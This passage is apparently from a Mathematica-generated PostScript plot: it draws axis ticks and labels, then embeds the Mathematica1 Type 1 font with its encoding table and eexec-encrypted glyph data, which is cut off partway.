Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +0.75 10.5 m +(4) N +P +[1 0 0 1 -366.287 -239.668 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +384.235 237.508 m +384.235 235.77 L +s +P +p +0 setlinecap +398.809 237.508 m +398.809 235.77 L +s +P +p +0 setlinecap +413.382 237.508 m +413.382 235.77 L +s +P +p +0 setlinecap +427.956 237.508 m +427.956 235.77 L +s +P +p +0 setlinecap +442.53 237.508 m +442.53 234.611 L +s +P +p +np 439 239 m +439 253 L +447 253 L +447 239 L +cp +clip np +p +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 439.53 239.668 ] concat +1 w +[ ] 0 setdash +p +np -1.53 -1.668 m +-1.53 14.332 L +8.47 14.332 L +8.47 -1.668 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +0 10.5 m +(5) N +P +[1 0 0 1 -439.53 -239.668 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +70.6 210.041 m +73.497 210.041 L +s +P +p +np 61 203 m +61 217 L +69 217 L +69 203 L +cp +clip np +p +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 62.44 203.666 ] concat +1 w +[ ] 0 setdash +p +np -2.44 -1.666 m +-2.44 14.334 L +7.56 14.334 L +7.56 -1.666 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +0 10.5 m +(0) N +P +[1 0 0 1 -62.44 -203.666 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +70.6 157.941 m +73.497 157.941 L +s +P +p +np 61 151 m +61 165 L +69 165 L +69 151 L +cp +clip np +p +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 61.69 151.566 ] concat +1 w +[ ] 0 setdash +p +np -1.69 -1.566 m +-1.69 14.434 L +8.31 14.434 L +8.31 -1.566 L +cp +clip np +%%BeginResource: font Mathematica1 +%%BeginFont: Mathematica1 +%!PS-AdobeFont-1.0: Mathematica1 001.000 +%%CreationDate: 8/26/01 at 4:07 PM +%%VMusage: 1024 31527 +% Mathematica typeface design by Andre Kuzniarek, with Gregg Snyder and Stephen Wolfram. Copyright \(c\) 1996-2001 Wolfram Research, Inc. [http://www.wolfram.com]. All rights reserved. [Font version 2.00] +% ADL: 800 200 0 +%%EndComments +FontDirectory/Mathematica1 known{/Mathematica1 findfont dup/UniqueID known{dup +/UniqueID get 5095641 eq exch/FontType get 1 eq and}{pop false}ifelse +{save true}{false}ifelse}{false}ifelse +20 dict begin +/FontInfo 16 dict dup begin + /version (001.000) readonly def + /FullName (Mathematica1) readonly def + /FamilyName (Mathematica1) readonly def + /Weight (Medium) readonly def + /ItalicAngle 0 def + /isFixedPitch false def + /UnderlinePosition -133 def + /UnderlineThickness 20 def + /Notice (Mathematica typeface design by Andre Kuzniarek, with Gregg Snyder and Stephen Wolfram. Copyright \(c\) 1996-2001 Wolfram Research, Inc. [http://www.wolfram.com]. All rights reserved. [Font version 2.00]) readonly def + /em 1000 def + /ascent 800 def + /descent 200 def +end readonly def +/FontName /Mathematica1 def +/Encoding 256 array +dup 0/NUL put +dup 1/Eth put +dup 2/eth put +dup 3/Lslash put +dup 4/lslash put +dup 5/Scaron put +dup 6/scaron put +dup 7/Yacute put +dup 8/yacute put +dup 9/HT put +dup 10/LF put +dup 11/Thorn put +dup 12/thorn put +dup 13/CR put +dup 14/Zcaron put +dup 15/zcaron put +dup 16/DLE put +dup 17/DC1 put +dup 18/DC2 put +dup 19/DC3 put +dup 20/DC4 put +dup 21/onehalf put +dup 22/onequarter put +dup 23/onesuperior put +dup 24/threequarters put +dup 25/threesuperior put +dup 26/twosuperior put +dup 27/brokenbar put +dup 28/minus put +dup 29/multiply put +dup 30/RS put +dup 31/US put +dup 32/Space put +dup 33/Exclamation put +dup 34/ForAll put +dup 35/NumberSign put +dup 36/Exists put +dup 37/Percent put +dup 38/Ampersand put +dup 39/SmallMember put +dup 40/LParen put +dup 41/RParen put +dup 42/Star put +dup 43/Plus put +dup 44/Comma put +dup 45/Minus put +dup 46/Period put +dup 47/Slash put +dup 48/Zero put +dup 49/One put +dup 50/Two put +dup 51/Three put +dup 52/Four put +dup 53/Five put +dup 54/Six put +dup 55/Seven put +dup 56/Eight put +dup 57/Nine put +dup 58/Colon put +dup 59/SemiColon put +dup 60/Less put +dup 61/Equal put +dup 62/Greater put +dup 63/Question put +dup 64/TildeFullEqual put +dup 65/CapAlpha put +dup 66/CapBeta put +dup 67/CapChi put +dup 68/CapDelta put +dup 69/CapEpsilon put +dup 70/CapPhi put +dup 71/CapGamma put +dup 72/CapEta put +dup 73/CapIota put +dup 74/CurlyTheta put +dup 75/CapKappa put +dup 76/CapLambda put +dup 77/CapMu put +dup 78/CapNu put +dup 79/CapOmicron put +dup 80/CapPi put +dup 81/CapTheta put +dup 82/CapRho put +dup 83/CapSigma put +dup 84/CapTau put +dup 85/CapUpsilon put +dup 86/FinalSigma put +dup 87/CapOmega put +dup 88/CapXi put +dup 89/CapPsi put +dup 90/CapZeta put +dup 91/LBracket put +dup 92/Therefore put +dup 93/RBracket put +dup 94/Perpendicular put +dup 95/Underbar put +dup 96/Hat put +dup 97/Alpha put +dup 98/Beta put +dup 99/Chi put +dup 100/Delta put +dup 101/Epsilon put +dup 102/Phi put +dup 103/Gamma put +dup 104/Eta put +dup 105/Iota put +dup 106/CurlyPhi put +dup 107/Kappa put +dup 108/Lambda put +dup 109/Mu put +dup 110/Nu put +dup 111/Omicron put +dup 112/Pi put +dup 113/Theta put +dup 114/Rho put +dup 115/Sigma put +dup 116/Tau put +dup 117/Upsilon put +dup 118/CurlyPi put +dup 119/Omega put +dup 120/Xi put +dup 121/Psi put +dup 122/Zeta put +dup 123/LBrace put +dup 124/VertBar put +dup 125/RBrace put +dup 126/Tilde put +dup 127/DEL put +dup 128/FractionBarExt put +dup 129/EscapeChar put +dup 130/SelectPlaceholder put +dup 131/Placeholder put +dup 132/Continuation put +dup 133/Skeleton put +dup 134/LSkeleton put +dup 135/RSkeleton put +dup 136/Spacer put +dup 137/Cross put +dup 138/DblEqual put +dup 139/Grave put +dup 140/Acute put +dup 141/DoubleAcute put +dup 142/OverTilde put +dup 143/OverBar put +dup 144/DblUpDownArrow put +dup 145/DblUpExtens1 put +dup 146/DblLongLArrow put +dup 147/DblExtens put +dup 148/DblLongRArrow put +dup 149/DblLRArrow2 put +dup 150/DblLongLRArrow put +dup 151/UpDownArrow put +dup 152/LongLArrow put +dup 153/LongRArrow put +dup 154/LongLRArrow put +dup 155/ColonEqual put +dup 156/Diamond2 put +dup 157/NotSquareSprsetEqual put +dup 158/AtSign put +dup 159/Solidmedsqr put +dup 160/OverDot put +dup 161/CurlyCapUpsilon put +dup 162/Prime put +dup 163/LessEqual put +dup 164/Fraction put +dup 165/Infinity put +dup 166/RuleDelayed put +dup 167/ClubSuit put +dup 168/DiamondSuit put +dup 169/HeartSuit put +dup 170/SpadeSuit put +dup 171/LRArrow put +dup 172/LArrow put +dup 173/UpArrow put +dup 174/RArrow put +dup 175/DownArrow put +dup 176/Degree put +dup 177/PlusMinus put +dup 178/DoublePrime put +dup 179/GreaterEqual put +dup 180/Multiply put +dup 181/Proportional put +dup 182/PartialDiff put +dup 183/Bullet put +dup 184/Divide put +dup 185/NotEqual put +dup 186/Equivalence put +dup 187/Approxequal put +dup 188/Ellipsis put +dup 189/ArrowVertEx put +dup 190/ArrowHorizEx put +dup 191/CarriageReturn put +dup 192/Aleph put +dup 193/IFraktur put +dup 194/RFraktur put +dup 195/Weierstrass put +dup 196/CircleMultiply put +dup 197/CirclePlus put +dup 198/EmptySet put +dup 199/Union put +dup 200/Intersection put +dup 201/ProperSuperset put +dup 202/NbSpace put +dup 203/NotSubset put +dup 204/ProperSubset put +dup 205/ReflexSubset put +dup 206/Element put +dup 207/NotElement put +dup 208/Angle put +dup 209/Gradient put +dup 210/RegTM put +dup 211/Copyright put +dup 212/TM put +dup 213/Product put +dup 214/Radical put +dup 215/DotMath put +dup 216/LogicalNot put +dup 217/Wedge put +dup 218/Vee put +dup 219/DblLRArrow put +dup 220/DblLArrow put +dup 221/DblUpArrow put +dup 222/DblRArrow put +dup 223/DblDownArrow put +dup 224/Lozenge put +dup 225/LAngle put +dup 226/Diffd put +dup 227/Expe put +dup 228/Imagi put +dup 229/Sum put +dup 230/LParenTop put +dup 231/LParenEx put +dup 232/LParenBot put +dup 233/LBracketTop put +dup 234/LBracketEx put +dup 235/LBracketBot put +dup 236/LBraceTop put +dup 237/LBraceMid put +dup 238/LBraceBot put +dup 239/BraceEx put +dup 240/Slot put +dup 241/RAngle put +dup 242/Intergral put +dup 243/IntegralTop put +dup 244/IntegralEx put +dup 245/IntegralBot put +dup 246/RParenTop put +dup 247/RParenEx put +dup 248/RParenBot put +dup 249/RBracketTop put +dup 250/RBracketEx put +dup 251/RBracketBot put +dup 252/RBraceTop put +dup 253/RBraceMid put +dup 254/RBraceBot put +dup 255/Wolf put + readonly def +/PaintType 0 def +/FontType 1 def +/StrokeWidth 0 def +/FontMatrix[0.001 0 0 0.001 0 0]readonly def +/UniqueID 5095641 def +/FontBBox{-120 -220 1544 923}readonly def +currentdict end +currentfile eexec +D8061D93A8246509E76A3EC656E953B7C22E43117F5A3BC2421790057C314DAE3EFBFF49F45DA34B +424A961BE670A194E7E4BF0FF295DEE23134A14A7C08B6602621D885EE631B1D8D3003CF2093E039 +4D77FCEFCA8BA8965D1783DCAD9EFE6C7E420CF7B898933309A89F84721ADE7F3AE4443C5EAE8155 +759A9EB6F738F7BA81C192EE45DAD00F398FFD6904111BBD91BFEE328004F2A18BCCD98DCDB2CE23 +961B00F204E50EA022D00CE2B68E653626D4BB5AFA334A0D657307416FAF7AA8C43ED4DC541F1B7B +B7500B3F423D9D369F8192FD00A59FD5E6ABC70F788FB70976CC1907DDC309F4B690AA2D2BF12CAE +C493958CC0E76CE9EB5FF8BD1F1650F659E5C123EE455B7D77C39952C212AF319BF19A91E36DE52F +0EF84B602704BD6C7C94E1B0E067210DB919F6231755A2CC5D5FE129279B43A2E2CCD27F56F00B05 +C8AC10AB07FABBEFB3509088301FE78CAF8B440C5BA2FFE06BBFCD066046618F3B6AA2E4B17B296E +1F3F1560E19CBAD54E16E4B7A65622E468F6BDF97C50277E355D1DD8843D0A449A147FFBA071BA99 +CF70D7576DC18B96FEAF8070BF25F3A3141F873241EF4A07F332306B56F1D5909A4F233A9DB3A08E +E43DF38DD6DB2D6DAB908967A907303EE1FA04F048FA6EBC531738C170B8B0F095FF3B05D14C2BDC +272F7EDA8926A77D9CDA49A90AE1387A51A24ECDB2E4E287B0F95A83AD2EC0310F9B6F396AC10479 +835035FD5D4C84D91917FE8A8755C976504AB1A830ED516B5F325EA4ADFD115900D23039A2BC84EE +D21CC21E2BBE29A5E0CF28BE047CBD515DF7785F37DDD4474042B102A1F28193BB8567FF6FDEF811 +25CE9A504BE5011C0010DCEBCF321824C9DA249D8DB11F79298F7B674CEDB6F33C111F8B0115E407 +99E0FE1B6CE9F6B2A3EED1827A9CEB453D643FE5CE2540DCBCAF7B2EA2C8F0AE9434D4BAAEAB3488 +FEC7541D57179BDEAA0BB6145EA783E73E70E0AA71A4FA58E81EB510E9FD2CF4ACFBF28E48CA313C +CF5ED2BE032B7C9A07ABBEC9CCD8D5AC9F775D36BECC252B9FE01B6AA79A70E22478904DADDA08BB +7CA3B66F3A83AEEBA37406127353790348AE5FBD144ABD8E1B32D1BCC70E2BC22A63E854D38317E6 +BB97C52A6C9B0C6AB5C336CE2D417A714825DCD237F7486C33925A995CD8AD3B359176C4CA775FE2 +2C6F8A7C7343F31F39D1B9A5A744973BF65D655DDB59E3495B28DBE2A877EBB32A22A4AB8EB13C67 +02B239F6932E2DC8B4B88915923B1C2AFF2F876A31F765B91747D5A858BD632B0BE4F135AC484016 +AE1BC01E44B6653A58EE1380B6DF24AEB73220A36FA8FDE9A152C16E049D2F247A9AA71CD2DF3D9E +653054FAF518BBC1EEB43200DB0BACA93FEA9445FA5F32A99926C4F1F2370B2E3E03CEFBEECE5D5C +DE299FE1641A9CE0C90E42E7C465DF8C19C153EA76C11791F8E112853E708CD0F6EFC22E44808A44 +3686442645D643E7118D128BF34188FD313E53B8E951E605E96825738C4DC893D942C145C3E1153F +CDED16D1EE10374626F45781461FFC94C77D431BCF167FD29136A0B369631E139A59B06AC5281B3D +52470B38237B469C0E49CBE74C82A940F8AAD10E05C5DD2A8F3218C4BE40DCED0982770869190845 +D2E8BA2A1A2F9CF16DDDE418B6E2013C3258FBE9AFCDACCD57B01C4FEF3526C06FD5BAB6F195C557 +23A96FA3E5CDB2ADC9AA8989DF78F163F19E26F3B9EAF60D44B745FCA49B09D9CE5CC16D1E2C78C5 +A28F14D3374956E9721C0542A01A731A3D5A771C7B51FB72960BB22C99BC8F216530AA86C1A0346B +3D986EF1DF68BCC46EC4C809C6D54FB9C50F225ABA2C96965F4DE77E2C5D131318231C6773F0976C +DBD016B803C38B8923822BDF160FB87BBE744D0953EDEBDE87394282B9950C89F58824D731355E8F +A3CE364F742E3337A983BD1219CE8787CFA6925B560001F6F78343647821D408B60965966C16C454 +394D33268483F51984614FD9964CCE5F1AA4AB12144874A72D3FE97F4416ABE4213B4EDCA9ECF73A +937B562F978E059705E561A6D0C8B89B59B4CAB2248BFC4A6D3D98F89FF38A4D1C3E5A4570E2E2E8 +D328772E11DEA2116C260B13328045139A819F5489A2C302F311898230CD26DD03E6CE3BE75EDB86 +0D982FBC8E1E24D1F83E8CA64174495B2F32BDF0505FC96E9C65FDB0EB0C4ADA410F0A1C4BB4D551 +93B1AA5EA1F988882A56413F77CF24FF6516CD5095077BA566116797895FD7EA616D10510957025A +1DA05064FD9176303A248C94CE2A9875C03C7D8755A1A8010B712B64BAD73BEA4195D51A328F076D +12C0E52E87D98A5269D157D544CD7B4E1CAAEA6BDD59F08D0C5FBB84A6B099BECF8BEB721A874BAA +1BD1F8CDB5ED5CD3B49A763EAA36D33837667A6643B83537EF5515DBF7659E28692E0ACEB48FD051 +45534A443092E0A510B05B5B51B402CB3372A4E8BAF98A7FEB6D8BEF6B364A5EA0F3FDF301A44EE2 +3485D4493E7B4C33E0E352202931188D156983C40F7A4B615B6F5281B33FB32A2E6A0F7AE84BEA2C +5C3635D7DA17371D608847EB402270B83293EC09E4B1D85996C1CC81196BE590EC9EF0F258364746 +BC4763976FDDB3707D37AFCBDC0F4EB2B1502F137EBBB1541B992EAD43B5D64CCDF505FF2F127115 +4857C69B689A11760979F6D2BB032CF0DCCBB33D2B6F6D6BB29A1D0E371AA5869A408225C0AFF523 +CEFB08A7D3D17DF9064010363196CC569C436E720B1B4573CDAE1CD93A10FD2D4ACB14E47046B5B7 +66B75B40BA97027FEC4218980B002FAB60A9F1F5A37861B9A63F696732F8127B2C6F036BF32311B8 +FF08A489E88218092D57A99C8981EF8CBBD09DF49CC836B9C1968692D1FB551F47619F020289F1A3 +D3898A96DC1C7D39A21B49C2D0DD9508CB8A8BD6A5EB40FF86F555FA32017B67AEC07BECD659E8C4 +8DD1D43E8D1EE08A117479015F78BF20D3318224572D9C90884856E4307A8AFFC83EDD317B008484 +3BBE8EB2A4E2D70077A639FE3637C3DCF87C67F1BE62E63CC67BCEF8EBD07E030524A53DD440F2A1 +3A019B7AA89E155AAD1497974258A01DA45DE1D94BB9F925290FE9BDDA29EA3F2BF1E64DF7EBCFC4 +23AB2C7310D9D87A5CA673EE95189135E1B134B431B231428FF2BF64C8F155CBDDAD17BCB524CF7E +ABD66B75705BFFB1DDB27B72D681D7AA19FAD0FF23EEF028B606DD20D58588AACB299A3CF38372A8 +E7494A65227C1E4A231AC7843962B8A4A7BDD90F3F8B83277E696F3514139BB8DD207641B62286F0 +0E32C7FAD7029DC0E092564C7CE1BC5240FCBFB00A06F075D9536F0326CFFBA958BA7A1A11AA047B +B14E7DE16761BB0FEF19ABE85154359807C339961B9695CDED59E489CA4D9BB75D86D9EDDF0502BC +0B4EC36B1D71FCD4E03881ECEC703E5DA23B3F5DB98CB8DAED81D5BA20B844A92A4B92FE5B082952 +6837237C7F994786878404BE744D0953C676E52CB05FCE193E8827F977B31929E36E320E770A6F1E +972B84AFA21E01719759DF0132C5CF9692BAA487E86E8453C09FF97642600D1024ED5D6C7D5B387D +CB5E6147D20B4A14D7D485B5747D765C5A1CA40B9416DC4EF5DC08F43F0706B27B1C90E901556E1C +EFF304EA8DF8D727E4B7E7CEAD14E4FC7E76002DBC37B92BD0E58AF29DA7DA91E6F99DADF1A9CBDD +04648E2F5B811F2AF0729646B17D32D7EF25AD47E267EE53A61A7CD744C9ABFDB1EDB71C0705412B +15769188CA1601AF0395796FAC0E2139EF90FAA65D27AAEEEE319D2831A56CE82203523097D0574D +22742D17E519D95560B8445B5B29033BF3454B94F20C23EBE8B90DDF26D903F1D66CB39D3A64579D +39D136C537CCD9FF2D6ACE5F79DE696C7330C0C4EA179D7911B7B67858D86CEE0833AB1E105B1993 +2A9BD572C41E78FB4A2A2421514DC2066E2F56101A9027F4BBA5D48E5DA9218E81CE46B95B50380F +560C67A5D547A8D32610AECECBB6F5A09DF44994F6DAC64F7399C07E182033BC1B9A32B69C41FDFC +7E1DCDDF273F045F154D727AFEE3CDB816CF2ECDB6733C579276353DD59C9D2AFA455935C1FCD0AB +7D57F9DD79FBCC7A45E5E5A501FF17EE1C5FF0823C6FDE29C60F85F6786940D8E3540E891B5BF7F5 +D36C57AC3AD359BFAB12B215E7FC94B933386C250E6B236506FA3D151ABAD893A817772071C09144 +6E5FB23A17591A4CECAA46DD46E3C41B4578F21D8894A59B72FAF6F88EE6E514FBD2FE69447D2B59 +9A6AA8BC5C1FD5C25E50BFB5CE5DBF5AD5771BC42FCC3706B6E9F7E4FAAFF2E63ED1684C5A4C136D +609D03E31EBCF31E864AAA74D8DDBCA52F85CCF14AB739CC55617EFC964D6CC6988AA45245B19CE2 +B63CB865DF1F1DA4A200A4A043C5CB706CD303EB31C32866ED92077AB11BF136D158840EAC67E7A1 +1BC2BFDCD5894AF735D677E1AC98BF3F19F69AF75355F168632037F6EDEBF61BE5854057AD05972C +7DA8D37AE65D35738547A9D835C6351D8D732F8C0DC49D7605F00A6A6045559D3A0B0CC21DFDD75E +2FCF25522001741EBBEB5CC97DDBD9DDCE490FE3CB186C101940DD02CACB685ECCB8C1DEDCDD4156 +F5F9F6B3CA53EC6E7E8A2F8159451CD5479D91BFBF91C6B32A1E0053017369330EAD2DDE323BCAC5 +EEC91A595473F447355B1BDFB873D0B538BF54AFB8EAADE5309E1B74283218F59272E59619D66405 +E74B5A9D6323CB76AF00FB27FD984F740601248C7206F59EF7FF4E95AF95327D12C47D2D34CBFF33 +29F28236831D7F0FD9D633B940D8282E1F1D5D95616CD839C6B41A7195A22B7A320864E48943CE99 +C68E3591A97689986A6536C3A1C37DA9838FF71A8C1A03094537C95D3585DF5AD9292874D8D05720 +030133B02E2754DA24712B52D6D8871422C709532B09D147EC8ACD861FA5392A82A6C2981347E327 +1986017B8315822B5FCB19A1B31BF6909E0D6490EC823434BFCE031045D20FFC675A73EBD7A39A50 +44C3B40906186CCF6E8502CD7915F053BC8CF6BE9FDD9A0330AE943D5C9A11D60D43F5BBE8A045EF +CDB7D19C0053F4F082303442C35C432E0DA4408C5917D24A6658DB807BD754AF140CE84A34F79851 +9323060D60F4EAC0E82D3E17042BB6729C69A8B8774904C6214C2EB016C528DC1428DB41075AA6C5 +4E4D849901838C6B6DADF7B67CD0CBC6EE1B415B44654D89397274D4A6AD2BA69DD81567F5B802F2 +684DD3516ECA0F6D66046EDA0B2B38F420A238D67D98676925ECBE6711D64DAE5DBE8AC5473A2EE9 +97AE65F0715A2E5DB2C75F20D9939EF58692EDA3AEA81F25AEC888327CFA6CC13D496714E63A1A87 +11FC50250D6D23FC7A8017038281F659A685ED7F1BB1ADBF8833ABC6DBEC0D96D08334E58C67E0F9 +0046132F0D4FBCB9CDF52EE74561498B42701AB826A6DD77F46C14753748E1EC66F4BD3583FCB4F1 +DC91050CF18B0D51BC366549261282779FC9694A7B987973C0D59F65CFF3CDB88D23952E46F5EEC1 +BDA0DC354188C11B0FA191F5C11A45BB9093701B33B8E7AC1A8621793D5326E92CDD3A76FB9B67D6 +860567B9CEE7B9F9056C6E9971F642DC0BCC1D2882B5BDF1B1CDCAA3FC61775A74E70CDFC128DE0F +9606091BB8E53905108EE77A1D3C506550FCFCAE454B020379BE3A7D6C62D162697AF1383F7BC8F2 +34FD616324C1E56E3E440277862CAB2C02395D9937816117F71A6828344182E6B5AF2799E29A6611 +9C0543E135300E44746EF2EBA57C4EABB1A15D8AC6D037F4BA2BE1EB4D1A7496F9711FC67E56D4D0 +FDA4D810B5383A72ACA15872DE9F3A9890E33759CE4DA493691BCA47A92E42D950DF588C3574D6FC +72B5AF7DDE915E3F5925B3E97DEBE6A4208CE7337754045607679296C4EEEA3A3EF1915E85EB1A32 +F1BBADB2904B09806631E20BBF5E57AF11BC784C75BF049B4BC7E479F1D4AE7754CBED7B11ED80A5 +2DD0006FAE5CC23A7C234CF628B42F4104A490E7D59E8B1F2A1395D37641C478FF8CB9FB602B29FD +3E48D6087CAEE48B523887F27F69DB32BF80B760B030A6766F8F9B19DE70704DAF81D3DED2BF663D +89B5BD8AF253BB8FA59DF84A52FDED83D2737532B6D66AFB9EF0446ACD44BFAB797AB9FDB47F2E18 +8F0A55887853772EBFD029B5FA0AFBAF10A88D464BD6F634C5839B230D583E36671A51DDB1EBF471 +8ABB84D057729D514751B0EEF4F756B91DEDAD7D9AD529B3886008F1F32645F3A205F304B2A8D808 +D37A38E389B8587E8D3654DC374568FCEBBA160395BE1D132B1ACB434164525FBF250A5AA30F3520 +F0F2A75F9D1B7C6EAB0223C209A120D894D6ECA336B57B7F2AB0E2A94E6616D7539010C700311966 +7B4A9EB3A812FEF4D100AB4C036401D21DDF8AEB393074638D154418D3A7AE51CD1F0C2D5CF4B475 +3B582D5071F91E6D3AFBFB09EAABBEAB2A60A5D388D16232939B5483CF7D5C1C9D05DDC85B266F39 +6F61E179AB9FAB644040014293EB53F2B50E8751F9D92D1DAE8DC89594905A39357C0098265FBD24 +E407F9A22027E36D5608FAF15BD9E354228E3BA943EC30301ABB2CB105F3B6D57C001EBF8328A8CA +318A7B1B999AE8BF9E2FD530B669640116149B622EB3C0A8CCDE62449DE9D39E0F5E5E01CBBF4F5E +52B33A2BD60B52FA4A5CE98B7313FE4C3FA30FA07DE4516109C3EAEE97ABE430C505647DD8B3DBF2 +BB4B3A806B14A9E0F629863F15D12A1CA62E8E055FA6ACABDE1926D3231CAC271C30A3F7AAC6084D +D88628B943052B618E4E39148600AC1EDB57B0835C291F73D29C51FCA3C5EFB1DB18A5CA47433B45 +C57EB3CB28AEBC68E4171E6DE357793B0FD2A1F4E76180248017112674DAD7ACA6ECAAF209CA174A +5603CEA5CE528F20919443900636E2FC79C303EA7B467A3F001EA8CB849BCF28BF40A3364C08ABC9 +B5D935CFEDA827A8C3FE2F6ABA54017D2AD0393A05AE21F7AE1F58AE1E992B5C889219DA157FA7EE +92E291DE2F9DFC244F2CF0FDCEFCACC487F0EA830985B687556D5AF53B81814DE9CE0C6C430DCBCE +51EBC6091B4E0227732E07DF20D59E9EED4D8A83761CED84CCE244BFD6A39103A2B48A684AEC9210 +5C94495D54FD6690AF857E5A3915E6A15689F1816F75F1FC8D5769B240639B339EBE54BC6D84794D +50F4EBE892530351984C6F8BEBE097CD46F4FED7D46E32830A16F77C13F13D17003737482F02D1B6 +F04C57B4C2B1929AA315B4BE1C7C9CB55F8981508546B67E4EBF84B6026C355C5E4E07CD98C95F07 +56F6643FB1DD7D8C77C4AF4C4F23602DD3F61D1C46583071AC460E74084F7F7CF812BC53975CAAF8 +B3C1160B5D6864AF08A1733FA893CE4248C8F8B46AEFCCF317DC726BC1E5F2445E462E0591BEAAEA +49AD8E4E2D3CF07F900EC46D596E9CDB3A8710A0B93CE5DA9D35E612596A6374F35AED0EF55DC46A +8E14A91163B87417259DE926BBC3FC5423FF0AE2AA6D740BFFD26981A57C8C1D97FB04A90A567296 +B07437F94C8FFF4709213DD5D8862A777CF3F97723F43A4F913F4A30F7554ACDAE34713654E21731 +C594C3718C0547FCDAF7BB1620B2D6BB19E65596A585290CC43F50B34A2FE6EB1E495ACFFB16DFEE +8784B66FCB9359600412969E2BDA330C421C68345A797C49728450A6CF41C926AE8EBBE80BD97863 +593C3E8AB5415A8BA625957F242378948F5C7EA9C2641312E8E46955FE5C1A1824C71D3B0C9FD211 +7CC965DA7C21D257587F291AB7C594459A11B977A278C74CF5E6598B0C75ABBB2FC1B3D167D7E31D +B519F4A0BDA650A3FE7F1A281DB9B69B57A23656BD820B22D0E30B07361FE7C90933E24A32B6DE2D +F240635D543315226E32487F264AFE83EFEAC74117321A82A92F4FC7B259F26DBE74C966B4CB3F4E +3499E30B9B326F72D73919D9FA9024AAC0B95B6751AD4CE569CC3DDFC399428DF1298FB1733FFCE6 +240FB3BE3A2837E1A66E08B784CDD131B5A61423508000785CDC5610CE4DA1DD314131767C8857E3 +3D9741EF3FD7B8D0AF0371CFFA3DCF74FF2D3B421AC0339EBC05FB4B61A2F46D6BD1144747AD148B +7968D7DF4D0F742AB39B0A04A88D66F5CF9876970879879872BFDA0C56C253DE5C72016B4990CEBB +2455DCDEC7465EE7C7E1C557B570E9F3EF3E31A22DC8AB9B17F34F48E135BE7820ACE383DB7C5B05 +8A9DC855C6850E49AB7D7D00ED2D23C50AEE671B11752F0A682EFE179CECBFAB47B76676AC0E8FD1 +0A47353D3AC3477A59B0F3CAF22849DE97AAC8B79935F7C57F3052DE7E13BA0FE7CEC4685C86E841 +EA8C7D6734D0FEEFF538CC2AA1414EC9126637E169FBE4ECAFDFA29A08451B25954F0094710195E1 +69E0A6004419E432E9319BE2AEC8D93407B25B758336946C6E30032657DD857BE9C0A05F487423D2 +0C2772D4416D27FEB5CCC971DDEDFE9B8C2D7DF9DEC90D0868D5DD18850BE567A04D08310883D9B2 +D50B817D0690F8550E238C1139C0A117B48199B1B4D489C9E52C58E0CA75E6C386ADD447D8AE52D1 +D979FD52A50D82BBCB8867B5D49C19BDEC414929DB67A00AF7C6482A87E46BD11D8E4E52783E5845 +FB2CC7439F99FF6552C7288354B436B1C361AB8C2932F77B14A50A7407FC0BCC29662D710248CA46 +AC42A03FBBEF9C972783942F3721BD32BDA3273D1E353D9E013D4CFF630BFE4E7C2963FECFE350A2 +860421D17D6ACA888FA26403726A0E16BD10638D8511A2C8A36C99E9B72A422038E1149BF88A7CA1 +B2DB196333F3AD32D6FE28F18FE1ADA06FD25E4597936A924E71C188B9E8779BDBA928A182042C96 +F6A14A6FAB5C1A819DB8E9374E32F77393734A65606809E90D188F749180A3E6CA7AD8044E168677 +15FDFF350D70B14454B692715DC3AE2CAA561FB953B478E873EB19C41A8D83288451E4E910D5988F +33D83C5974DD0EE4DF2E6C849C500D0714038ECB1E9336D71D852889F2FBCA6769949699BE6BBF19 +A9318CCD7C845D0EC7FF3CFD871328CF7B45E6BBBBD16094E8ABE4D3789DEAD2C930AC8D810C911C +03AF2BDA4EBA62810F19B4506592005ACFF16EB58E33D6A71EA4DAD28A2D7B10FF89ACAB4BCC0F96 +E622EBA20347AE04C62A298257D1623977D185BB46B42CCDD733F72B37072B8DFAA5D7FF77E35618 +3F6D25EE1D951F7EBFBEA8FA17A859B8545BDB212A6BFE9C3078C32124C4E5D4DA09404E40498F76 +7B7164C13E12BF006EE8DE408070296EF0A08AF759206DB3C445BF49EAB18ECDE1FEDEFFAB653FDC +B13FA4649B35D12266FD42D0498331560E96F54D4238678F70233F56097E1944FC671D6BB1AB66CD +E0E9DC24349E44D67C36B3E3A00B07755749A597DF31C25F28D55779841BD3F6221BCDE389852DD4 +590E075C1298B36181D9F64BDCB54A556C05A9EF661EA1CC7C7549A3E1CCF79B87A6E71C3ACDECC9 +C4EFB05B643744407029258B8225DBF960DE529EEC262D1D3113F6CDDBCF4BDAB706BF085C0FF2EE +E8420CF755E46B053B774DF37C5683F8432EEC183C96176BFB24B3F478FACACBF1FCB73D83D4D857 +2D0F15783C8AE95D7CE959D794FDE1D973867D8F30A301598BDB7F2824B2629D64B88F0FF4498B6F +3728CF8916EA884C5930677E7481F90C85ED41DD28AA00E714D3A4F2CC136E417A4C591C7944C409 +70D2BCBE410A940937C3CAA118FA32317444B401968B8ECB2F0B3C8DAF6D4886C2015000A71FDAD4 +066B82312A4CD1E49A9ACFA05C3E7CA5A5CB3FA713CA0AD9E66A34730A36612C72D1F803D4CB1501 +9184FA2FDB3E5D067BC64B29299D5531565264B70FFFF86F5A5B03848E55D73337650208D21F35BB +D5C14748CBE17EB3A7E02BE53136DC69E8740C597CE28472CAEEB96EF2A5752CF17CFBB82F6C104F +2BBB50C216C49E8AB7E661207E1742B35392752051A1E409BEDCDA2654CB5155B770C8C5E4A2968A +A35CF1924D0C74A8D23AB811B7DCE60F1EBC1494A295C8D670E84B7B886A6064151065BD96F2D364 +7BA049A444CF16EB6432CAFCC70FF2E8B354F55A192C94BF08D156856A6512403F5140DF4C8D254E +DA59B2B3ADEE19A35E9A61202B711193A7E7BA8EF427152157DA5A51084EA46510864E1CD7B4FD11 